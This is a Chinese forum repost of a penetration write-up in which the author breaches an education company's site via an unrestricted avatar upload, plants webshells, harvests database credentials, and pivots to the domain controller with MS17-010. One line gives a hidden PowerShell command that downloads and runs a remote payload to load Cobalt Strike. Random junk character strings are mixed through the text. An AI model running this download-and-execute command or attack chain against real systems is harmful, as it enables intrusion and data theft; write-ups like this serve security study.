这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路6 k; d9 }7 _* D
1 [8 K. m) L9 W- A$ [
( {( v0 N6 G9 O! H& O u 正文/ r0 r2 i+ M: [; p
" w7 j0 a: j3 H0 |/ O
( k- p. O; q1 t1 E( q/ X2 O7 H* q0 R5 `; z7 h* }
目标:www.xxxx.com(一家教育机构)
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能# `' y& V7 I8 s( O
$ v/ @( r L$ m' H/ |
2 p$ Q9 u* }1 h. J, E' H6 M3 r
" M& W: @1 J5 J/ \: h% D
进行了简单的信息搜集
7 T8 L* e/ B$ F& f/ K' P
2 }5 s: g9 v ~- v/ E' i
( e1 {' m# J% V4 A. F3 Z8 f 子域名搜集
( w5 Z) }, G2 z( W9 h0 ^) R
fofa找资产
2 x! |$ k* |+ D+ g2 f3 X5 p' z
c4 x, ^2 G. m( e
, }( |/ F* b2 w* s m: i+ s
一共七个资产。去重之后只有两个。
! i+ V" {6 z& b# ^( ^
+ H+ e* g- D3 L" K* h9 r8 M2 A4 l
7 z; ?/ Y; D7 p: t# B+ G" X
目录探测
0 }9 x# S D9 u% s
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
' V5 V2 ?; b9 h$ X0 z& |
+ u+ Y: v: b( ]9 l
3 }& R9 d0 Y; b4 Q& p' E$ r
/ }& D! r; D- ~% `) L4 t 我又尝试了通过修改返回包来绕过登录界面
还是不行,尝试注入无果5 q. O3 n- w" M! k) Z
8 Y: Y8 x) b b" w
. G; S. z! Q2 }
不过我目录探测出了一处Spring信息泄露
* z& ~6 x0 c& g! U9 _, u
8 ^% i! d2 c, c$ m. A
3 f/ K2 H9 g: r0 i9 b) G G1 L 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录, ~7 c5 T6 C* ?# { _
6 I% T4 l9 \- A2 e
) F [+ i; K; U# S
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
5 M' T" Q0 e' e& w/ c9 N$ I; N+ S
获取有些师傅到这一步就手机抓包电脑测了。
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
3 r& C+ p" a8 k- ]+ ?7 d 其中在一个公众号发现了小程序,可以进行注册。7 D" }8 b5 c$ R; G% `9 X
+ a2 G% m0 h5 W3 c看到了头像上传,尝试上传获取WebShell9 W1 r% q: K' Z1 y, I( a
* C ^* m" t+ H5 x
' N2 b U( N( r. ]* V- x( R9 ~7 H. N" D
2 X5 V! n" C: J9 p' E- c9 u" v 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
7 G. Y+ ^7 A- e+ q2 Q |' w9 v/ U8 Y7 X4 @5 O# v
* @$ S. k( h: I4 L* f
然后上了大马/ V* |" x1 s( N* S& v6 |' W) B, a
; k) h2 m1 q& W5 Q! p/ f& @
通过翻找文件发现数据库账号密码; ]3 B' |+ E' e' B1 Z9 R; O
% K3 ?) `: q* g1 V* a4 h) T2 ~: @" l$ |8 L U
& ]" [/ C" ^% |* D- O
4 o* X5 {0 J; N0 ]1 c3 j --内网渗透
$ Z+ J R# F9 p9 r w 直接通过powershell执行 cs上线
/ W3 F3 ^ F5 p" H. {! D# ^* ^/ d- l/ u* F- M$ L powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
. ]4 C2 s% y8 l* c- X# Y% X, d1 [7 }& \
1 s0 d/ A1 O! I" T 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破9 ~5 {* U2 J- @ k8 ]9 C/ v
: t* M/ A/ n# B# f
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
& K. z! u; e) r9 |, S* ^9 O
$ x0 V8 |6 Q, a
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
3 d0 [/ |+ V1 j' J
( A0 f& z6 K% N% e) T( ?; P
K. [, y! B8 j/ U
小结
8 r4 y- c9 s- r& w6 y7 U1 d4 D. K1 W& w. d1 w
, Q* u4 ]6 [. g4 w% B; T4 q/ Y 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!7 q7 W" c: N" q1 J
; v: \) i2 R) P3 [9 N2 L5 r# R2 `5 X( s$ }) a3 F, P* T! J / I: g( y& L9 F5 t6 v9 g9 B
4 f8 g! }$ @# O作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
$ E5 ]/ e# p1 j0 W- R6 I- X4 k) y
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |